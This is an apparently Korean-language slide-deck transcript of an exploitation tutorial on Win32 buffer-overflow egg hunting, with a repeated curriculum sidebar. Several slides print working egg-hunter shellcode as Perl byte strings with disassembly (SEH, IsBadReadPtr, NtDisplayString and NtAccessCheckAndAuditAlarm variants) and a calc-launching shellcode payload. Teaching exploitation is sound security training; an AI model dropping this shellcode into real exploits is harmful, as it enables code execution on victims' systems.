system hacking tutorial #3 - buffer overflow - egg hunting
TRANSCRIPT
![Page 1: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting](https://reader036.vdocuments.site/reader036/viewer/2022062313/55a260271a28ab520d8b45be/html5/thumbnails/1.jpg)
System Hacking & Reverse Engineering
documented by h2spice [email protected]
[ Buffer Overflow - Egg Hunting ]
![Page 2: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting](https://reader036.vdocuments.site/reader036/viewer/2022062313/55a260271a28ab520d8b45be/html5/thumbnails/2.jpg)
Who am I
Sanghwan,Ahn (h2spice)
Works for LINE.Corp
Carrying out research on the vulnerability (exploitation,hunt,analysis)
![Page 3: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting](https://reader036.vdocuments.site/reader036/viewer/2022062313/55a260271a28ab520d8b45be/html5/thumbnails/3.jpg)
시스템 해킹 / 리버싱
취약점 원리
Buffer Overflow
Format String Bug
Stack Overflow
Use After Free
Heap Overflow
Heap Overflow
익스플로잇(Win32/*NIX/ARM)
Overwriting RET
Egg Hunting
Overwriting SEH
RTL
ROP
Heap Spraying
취약점 / 악성코드 분석
악성코드 분석
버그 헌팅
X86 ARM
취약점 분석
Software on X86
Mobile
소스코드 분석
퍼징
CVE-XXXX-XXXX
Exploit-DBInj3ct0r - 1337day
리버스 엔지니어링
iOS
Android
커리큘럼 소개
Overwriting .dtors
Overwriting GOT
![Page 4: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting](https://reader036.vdocuments.site/reader036/viewer/2022062313/55a260271a28ab520d8b45be/html5/thumbnails/4.jpg)
목차커리큘럼 소개
Track3 - Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP
Heap Spray
Track3-2 *NIX
Overwrite RET
RTL
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
RTL
ROP
![Page 5: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting](https://reader036.vdocuments.site/reader036/viewer/2022062313/55a260271a28ab520d8b45be/html5/thumbnails/5.jpg)
Track3. Exploitation
![Page 6: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting](https://reader036.vdocuments.site/reader036/viewer/2022062313/55a260271a28ab520d8b45be/html5/thumbnails/6.jpg)
Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
![Page 7: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting](https://reader036.vdocuments.site/reader036/viewer/2022062313/55a260271a28ab520d8b45be/html5/thumbnails/7.jpg)
What is the Egg-Hunting ?
프로세스의 VAS(Virtual Address Space) 검색 기술 이용
공격가능한 벡터가 아주 작은 크기의 Buffer 만을 제공할때 유용(공격자가 프로그램의 흐름을 제어할 수 있다는 전제하에)
Egg Hunting 은 기본적으로 3가지의 코드로 구성
Egg Hunter Code
Marker or Tag
Arbitrary Shell Code
Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
![Page 8: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting](https://reader036.vdocuments.site/reader036/viewer/2022062313/55a260271a28ab520d8b45be/html5/thumbnails/8.jpg)
How to work Egg-Hunter Code ?Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
Egg-Hunter Code\x66\x81\xCA\xFF\x0F\x42\x52\x6A \x02\x58\xCD\x2E\x3C\x05\x5A\x74 \xEF\xB8 \x77\x30\x30\x74 (marker/tag: w00t)\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7 \xFF\xE7
Shell Code (Calc)\x89\xe2\xda\xc1\xd9\x72\xf4\x58 \x50\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54 \x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4a\x48\x50 \x44\x43\x30\x43\x30\x45\x50\x4c \x4b\x47\x35\x47\x4c\x4c\x4b\x43 \x4c\x43\x35\x43\x48\x45\x51\x4a \x4f\x4c\x4b\x50\x4f\x42\x38\x4c\x4b\x51\x4f\x47\x50\x43\x31\x4a
Marker / Tag\x77\x30\x30\x74\x77\x30\x30\x74
(w00tw00t)
![Page 9: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting](https://reader036.vdocuments.site/reader036/viewer/2022062313/55a260271a28ab520d8b45be/html5/thumbnails/9.jpg)
How to work Egg-Hunter Code ?Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
Egg-Hunter Code\x66\x81\xCA\xFF\x0F\x42\x52\x6A \x02\x58\xCD\x2E\x3C\x05\x5A\x74 \xEF\xB8 \x77\x30\x30\x74 (marker/tag: w00t)\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7 \xFF\xE7
Shell Code (Calc)\x89\xe2\xda\xc1\xd9\x72\xf4\x58 \x50\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54 \x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4a\x48\x50 \x44\x43\x30\x43\x30\x45\x50\x4c \x4b\x47\x35\x47\x4c\x4c\x4b\x43 \x4c\x43\x35\x43\x48\x45\x51\x4a \x4f\x4c\x4b\x50\x4f\x42\x38\x4c\x4b\x51\x4f\x47\x50\x43\x31\x4a
Marker / Tag\x77\x30\x30\x74\x77\x30\x30\x74
(w00tw00t)+
![Page 10: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting](https://reader036.vdocuments.site/reader036/viewer/2022062313/55a260271a28ab520d8b45be/html5/thumbnails/10.jpg)
How to work Egg-Hunter Code ?Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
Egg-Hunter Code\x66\x81\xCA\xFF\x0F\x42\x52\x6A \x02\x58\xCD\x2E\x3C\x05\x5A\x74 \xEF\xB8 \x77\x30\x30\x74 (marker/tag: w00t)\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7 \xFF\xE7
\x89\xe2\xda\xc1\xd9\x72\xf4\x58 \x50\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54 \x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4a\x48\x50 \x44\x43\x30\x43\x30\x45\x50\x4c \x4b\x47\x35\x47\x4c\x4c\x4b\x43 \x4c\x43\x35\x43\x48\x45\x51\x4a \x4f\x4c\x4b\x50\x4f\x42\x38\x4c\x4b\x51\x4f\x47\x50\x43\x31\x4a\x4b\x51\x59\x4c\x4b\x46\x54\x4c\x4b\x43\x31\x4a\x4e\x50\x31\x49 \x50\x4c\x59\x4e\x4c\x4c\x44\x49
Marker / Tag + Shell Code\x77\x30\x30\x74\x77\x30\x30\x74
(w00tw00t)
![Page 11: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting](https://reader036.vdocuments.site/reader036/viewer/2022062313/55a260271a28ab520d8b45be/html5/thumbnails/11.jpg)
How to work Egg-Hunter Code ?Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
Egg-Hunter Code\x66\x81\xCA\xFF\x0F\x42\x52\x6A \x02\x58\xCD\x2E\x3C\x05\x5A\x74 \xEF\xB8 \x77\x30\x30\x74 (marker/tag: w00t)\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7 \xFF\xE7
\x89\xe2\xda\xc1\xd9\x72\xf4\x58 \x50\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54 \x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4a\x48\x50 \x44\x43\x30\x43\x30\x45\x50\x4c \x4b\x47\x35\x47\x4c\x4c\x4b\x43 \x4c\x43\x35\x43\x48\x45\x51\x4a \x4f\x4c\x4b\x50\x4f\x42\x38\x4c\x4b\x51\x4f\x47\x50\x43\x31\x4a\x4b\x51\x59\x4c\x4b\x46\x54\x4c\x4b\x43\x31\x4a\x4e\x50\x31\x49 \x50\x4c\x59\x4e\x4c\x4c\x44\x49
Marker / Tag + Shell Code\x77\x30\x30\x74\x77\x30\x30\x74
(w00tw00t)
! Search Memory & Find Marker
![Page 12: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting](https://reader036.vdocuments.site/reader036/viewer/2022062313/55a260271a28ab520d8b45be/html5/thumbnails/12.jpg)
How to work Egg-Hunter Code ?Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
Egg-Hunter Code\x66\x81\xCA\xFF\x0F\x42\x52\x6A \x02\x58\xCD\x2E\x3C\x05\x5A\x74 \xEF\xB8 \x77\x30\x30\x74 (marker/tag: w00t)\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7 \xFF\xE7
\x89\xe2\xda\xc1\xd9\x72\xf4\x58 \x50\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54 \x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4a\x48\x50 \x44\x43\x30\x43\x30\x45\x50\x4c \x4b\x47\x35\x47\x4c\x4c\x4b\x43 \x4c\x43\x35\x43\x48\x45\x51\x4a \x4f\x4c\x4b\x50\x4f\x42\x38\x4c\x4b\x51\x4f\x47\x50\x43\x31\x4a\x4b\x51\x59\x4c\x4b\x46\x54\x4c\x4b\x43\x31\x4a\x4e\x50\x31\x49 \x50\x4c\x59\x4e\x4c\x4c\x44\x49
Marker / Tag + Shell Code\x77\x30\x30\x74\x77\x30\x30\x74
(w00tw00t)
! Search Memory & Find Marker
" Store Marker’s Addr & Jump to there
![Page 13: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting](https://reader036.vdocuments.site/reader036/viewer/2022062313/55a260271a28ab520d8b45be/html5/thumbnails/13.jpg)
How to work Egg-Hunter Code ?Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
Egg-Hunter Code\x66\x81\xCA\xFF\x0F\x42\x52\x6A \x02\x58\xCD\x2E\x3C\x05\x5A\x74 \xEF\xB8 \x77\x30\x30\x74 (marker/tag: w00t)\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7 \xFF\xE7
\x89\xe2\xda\xc1\xd9\x72\xf4\x58 \x50\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54 \x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4a\x48\x50 \x44\x43\x30\x43\x30\x45\x50\x4c \x4b\x47\x35\x47\x4c\x4c\x4b\x43 \x4c\x43\x35\x43\x48\x45\x51\x4a \x4f\x4c\x4b\x50\x4f\x42\x38\x4c\x4b\x51\x4f\x47\x50\x43\x31\x4a\x4b\x51\x59\x4c\x4b\x46\x54\x4c\x4b\x43\x31\x4a\x4e\x50\x31\x49 \x50\x4c\x59\x4e\x4c\x4c\x44\x49
Marker / Tag + Shell Code\x77\x30\x30\x74\x77\x30\x30\x74
(w00tw00t)
! Search Memory & Find Marker
# Execute Shell Code
" Store Marker’s Addr & Jump to there
![Page 14: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting](https://reader036.vdocuments.site/reader036/viewer/2022062313/55a260271a28ab520d8b45be/html5/thumbnails/14.jpg)
Important in order for Egg-Hunting to work사용자 입력값으로부터 프로그램의 흐름을 제어you must be able to jump to (jmp, call, push/ret) & execute some shellcode Egg-Hunter Code는 예측 가능한 메모리 영역에 위치egg-hunter code must be available in a predictable location (so you can reliably jump to it & execute it)
Marker/Tag은 고유 식별자여야 하며, 최종 쉘코드 앞에 위치 you must prepend the final shell code with a unique string/marker/tag
메모리 검색에 필요한 기술을 테스트하여 특정 시스템에 가장 적합한 기술을 확인(IsBadReadPtr,NtDisplayString,NtAccessCheck/AuditAlarm,NtDisplayString/NtAccessChe ckAndAuditAlarm)you’ll have to test which technique to search memory works for a particular exploit 버퍼의 크기가 Egg-Hunter Code가 삽입 될 만큼의 최소한 크기가 필요the amount of available buffer space can be relatively small, because it will only contain the so-called “egg-hunter” 최종 쉘코드는 임의의 메모리 내 위치(Stack/Heap/Etc)the final shell code must be available somewhere in memory
Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
![Page 15: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting](https://reader036.vdocuments.site/reader036/viewer/2022062313/55a260271a28ab520d8b45be/html5/thumbnails/15.jpg)
Egg-Hunter using SEH injectionTrack3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
my $egghunter = "\xeb\x21\x59\xb8"."w00t".“\x51\x6a\xff\x33\xdb\x64\x89\x23".“\x6a\x02\x59\x8b\xfb\xf3\xaf\x75".“\x07\xff\xe7\x66\x81\xcb\xff\x0f".“\x43\xeb\xed\xe8\xda\xff\xff\xff".“\x6a\x0c\x59\x8b\x04\x0c\xb1\xb8".“\x83\x04\x08\x06\x58\x83\xc4\x10".“\x50\x33\xc0\xc3";
Egg-hunter Code using SEH injection EB21 jmp short 0x2359 pop ecxB890509050 mov eax,0x50905090 ; this is the Marker51 push ecx6AFF push byte -0x133DB xor ebx,ebx648923 mov [fs:ebx],esp6A02 push byte +0x259 pop ecx8BFB mov edi,ebxF3AF repe scasd7507 jnz 0x20FFE7 jmp edi6681CBFF0F or bx,0xfff43 inc ebxEBED jmp short 0x10E8DAFFFFFF call 0x26A0C push byte +0xc59 pop ecx8B040C mov eax,[esp+ecx]B1B8 mov cl,0xb883040806 add dword [eax+ecx],byte +0x658 pop eax83C410 add esp,byte+0x1050 push eax33C0 xor eax,eaxC3 ret
Egg hunter size = 60 bytes, Egg size = 8 bytes
![Page 16: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting](https://reader036.vdocuments.site/reader036/viewer/2022062313/55a260271a28ab520d8b45be/html5/thumbnails/16.jpg)
Egg-Hunter using SEH injectionTrack3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
EB21 jmp short 0x2359 pop ecxB890509050 mov eax,0x50905090 ; this is the Marker51 push ecx6AFF push byte -0x133DB xor ebx,ebx648923 mov [fs:ebx],esp6A02 push byte +0x259 pop ecx8BFB mov edi,ebxF3AF repe scasd7507 jnz 0x20FFE7 jmp edi6681CBFF0F or bx,0xfff43 inc ebxEBED jmp short 0x10E8DAFFFFFF call 0x26A0C push byte +0xc59 pop ecx8B040C mov eax,[esp+ecx]B1B8 mov cl,0xb883040806 add dword [eax+ecx],byte +0x658 pop eax83C410 add esp,byte+0x1050 push eax33C0 xor eax,eaxC3 ret
Egg hunter size = 60 bytes, Egg size = 8 bytes
my $egghunter = "\xeb\x21\x59\xb8"."w00t".“\x51\x6a\xff\x33\xdb\x64\x89\x23".“\x6a\x02\x59\x8b\xfb\xf3\xaf\x75".“\x07\xff\xe7\x66\x81\xcb\xff\x0f".“\x43\xeb\xed\xe8\xda\xff\xff\xff".“\x6a\x0c\x59\x8b\x04\x0c\xb1\xb8".“\x83\x04\x08\x06\x58\x83\xc4\x10".“\x50\x33\xc0\xc3";
Egg-hunter Code using SEH injection! Move marker to EAX
" Repeat until find the Marker
![Page 17: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting](https://reader036.vdocuments.site/reader036/viewer/2022062313/55a260271a28ab520d8b45be/html5/thumbnails/17.jpg)
Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
my $egghunter = “\x33\xdb\x66\x81"."\xcb\xff\x0f\x43\x6a\x08\x53\xb8"."\x0d\x5b\xe7\x77\xff\xd0\x85\xc0"."\x75\xec\xb8"."w00t".“\x8b\xfb\xaf\x75\xe7\xaf\x75\xe4"."\xff\xe7";
Egg-hunter Code using IsBadReadPtr
Egg-Hunter using IsBadReadPtr33DB xor ebx,ebx6681CBFF0F or bx,0xfff43 inc ebx6A08 push byte +0x853 push ebxB80D5BE777 mov eax,0x77e75b0dFFD0 call eax85C0 test eax,eax75EC jnz 0x2B890509050 mov eax,0x50905090 ; this is the Marker8BFB mov edi,ebxAF scasd75E7 jnz 0x7AF scasd75E4 jnz0x7FFE7 jmp edi
Egg hunter size = 37 bytes, Egg size = 8 bytes
![Page 18: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting](https://reader036.vdocuments.site/reader036/viewer/2022062313/55a260271a28ab520d8b45be/html5/thumbnails/18.jpg)
Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
Egg-Hunter using IsBadReadPtr33DB xor ebx,ebx6681CBFF0F or bx,0xfff43 inc ebx6A08 push byte +0x853 push ebxB80D5BE777 mov eax,0x77e75b0dFFD0 call eax85C0 test eax,eax75EC jnz 0x2B890509050 mov eax,0x50905090 ; this is the Marker8BFB mov edi,ebxAF scasd75E7 jnz 0x7AF scasd75E4 jnz0x7FFE7 jmp edi
Egg hunter size = 37 bytes, Egg size = 8 bytes
! Move marker to EAX
" Repeat until find the Marker
my $egghunter = “\x33\xdb\x66\x81"."\xcb\xff\x0f\x43\x6a\x08\x53\xb8"."\x0d\x5b\xe7\x77\xff\xd0\x85\xc0"."\x75\xec\xb8"."w00t".“\x8b\xfb\xaf\x75\xe7\xaf\x75\xe4"."\xff\xe7";
Egg-hunter Code using IsBadReadPtr
![Page 19: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting](https://reader036.vdocuments.site/reader036/viewer/2022062313/55a260271a28ab520d8b45be/html5/thumbnails/19.jpg)
Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
my $egghunter =“\x66\x81\xCA\xFF\x0F\x42\x52\x6A"."\x43\x58\xCD\x2E\x3C\x05\x5A\x74"."\xEF\xB8"."w00t".“\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7"."\xFF\xE7";
Egg-hunter Code using NtDisplayString
Egg-Hunter using NtDisplayString6681CAFF0F or dx,0x0fff42 inc edx52 push edx6A43 push byte +0x4358 pop eaxCD2E int 0x2e3C05 cmp al,0x55A pop edx74EF jz 0x0B890509050 mov eax,0x50905090 ; this is the Marker8BFA mov edi,edxAF scasd75EA jnz 0x5AF scasd75E7 jnz 0x5FFE7 jmp edi
Egg hunter size = 32 bytes, Egg size = 8 bytes
![Page 20: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting](https://reader036.vdocuments.site/reader036/viewer/2022062313/55a260271a28ab520d8b45be/html5/thumbnails/20.jpg)
Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
Egg-Hunter using NtDisplayString6681CAFF0F or dx,0x0fff42 inc edx52 push edx6A43 push byte +0x4358 pop eaxCD2E int 0x2e3C05 cmp al,0x55A pop edx74EF jz 0x0B890509050 mov eax,0x50905090 ; this is the Marker8BFA mov edi,edxAF scasd75EA jnz 0x5AF scasd75E7 jnz 0x5FFE7 jmp edi
Egg hunter size = 32 bytes, Egg size = 8 bytes
! Move marker to EAX
" Repeat until find the Marker
my $egghunter =“\x66\x81\xCA\xFF\x0F\x42\x52\x6A"."\x43\x58\xCD\x2E\x3C\x05\x5A\x74"."\xEF\xB8"."w00t".“\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7"."\xFF\xE7";
Egg-hunter Code using NtDisplayString
![Page 21: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting](https://reader036.vdocuments.site/reader036/viewer/2022062313/55a260271a28ab520d8b45be/html5/thumbnails/21.jpg)
Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
my $egghunter =“\x66\x81\xCA\xFF\x0F\x42\x52\x6A"."\x02\x58\xCD\x2E\x3C\x05\x5A\x74"."\xEF\xB8"."w00t".“\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7"."\xFF\xE7";
Egg-hunter Code using NtDisplayString
Egg-Hunter using NtAccessCheck(AndAuditAlarm)6681CAFF0F or dx,0x0fff42 inc edx52 push edx6A02 push byte +0x0258 pop eaxCD2E int 0x2e3C05 cmp al,0x55A pop edx74EF jz 0x0B890509050 mov eax,0x50905090 ; this is the Marker8BFA mov edi,edxAF scasd75EA jnz 0x5AF scasd75E7 jnz 0x5FFE7 jmp edi
Egg hunter size = 32 bytes, Egg size = 8 bytes
NtDisplayString을 이용한 Egg-Hunter 와 비슷한 형태를 가지나, 다른 종류의 에그 헌터로, 위와 같은 형태를 가지고 있다. NtDisplayString을 사용하는 대신, 이 방식은 에그 헌터를 넘겨 받아서 발생할 수 있는 접근 위반을 방지하고자, NtAccessCheckAndAuditAlarm (KiServiceTable 내부의 오프셋 0x02)을 사용한다.
NtAccessCheck에 대한 자세한 내용은 아래 링크 참조 - http://undocumented.rawol.com/sbs-w2k-5-monitoring-native-api-calls.pdf - http://xosmos.net/txt/nativapi.html
![Page 22: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting](https://reader036.vdocuments.site/reader036/viewer/2022062313/55a260271a28ab520d8b45be/html5/thumbnails/22.jpg)
Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
my $egghunter =“\x66\x81\xCA\xFF\x0F\x42\x52\x6A"."\x02\x58\xCD\x2E\x3C\x05\x5A\x74"."\xEF\xB8"."w00t".“\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7"."\xFF\xE7";
Egg-hunter Code using NtDisplayString
Egg-Hunter using NtAccessCheck(AndAuditAlarm)6681CAFF0F or dx,0x0fff42 inc edx52 push edx6A02 push byte +0x0258 pop eaxCD2E int 0x2e3C05 cmp al,0x55A pop edx74EF jz 0x0B890509050 mov eax,0x50905090 ; this is the Marker8BFA mov edi,edxAF scasd75EA jnz 0x5AF scasd75E7 jnz 0x5FFE7 jmp edi
Egg hunter size = 32 bytes, Egg size = 8 bytes
NtDisplayString을 이용한 Egg-Hunter 와 비슷한 형태를 가지나, 다른 종류의 에그 헌터로, 위와 같은 형태를 가지고 있다. NtDisplayString을 사용하는 대신, 이 방식은 에그 헌터를 넘겨 받아서 발생할 수 있는 접근 위반을 방지하고자, NtAccessCheckAndAuditAlarm (KiServiceTable 내부의 오프셋 0x02)을 사용한다.
NtAccessCheck에 대한 자세한 내용은 아래 링크 참조 - http://undocumented.rawol.com/sbs-w2k-5-monitoring-native-api-calls.pdf - http://xosmos.net/txt/nativapi.html
! Move marker to EAX
" Repeat until find the Marker
![Page 23: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting](https://reader036.vdocuments.site/reader036/viewer/2022062313/55a260271a28ab520d8b45be/html5/thumbnails/23.jpg)
Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
Egg-Hunter using NtAccessCheck(AndAuditAlarm)
![Page 24: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting](https://reader036.vdocuments.site/reader036/viewer/2022062313/55a260271a28ab520d8b45be/html5/thumbnails/24.jpg)
Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
Egg-Hunter using NtAccessCheck(AndAuditAlarm)
! 메모리 검색을 시작할 위치 지정
![Page 25: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting](https://reader036.vdocuments.site/reader036/viewer/2022062313/55a260271a28ab520d8b45be/html5/thumbnails/25.jpg)
Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
Egg-Hunter using NtAccessCheck(AndAuditAlarm)
" 다음 메모리 검색을 위해 주소 값을 증가
![Page 26: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting](https://reader036.vdocuments.site/reader036/viewer/2022062313/55a260271a28ab520d8b45be/html5/thumbnails/26.jpg)
Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
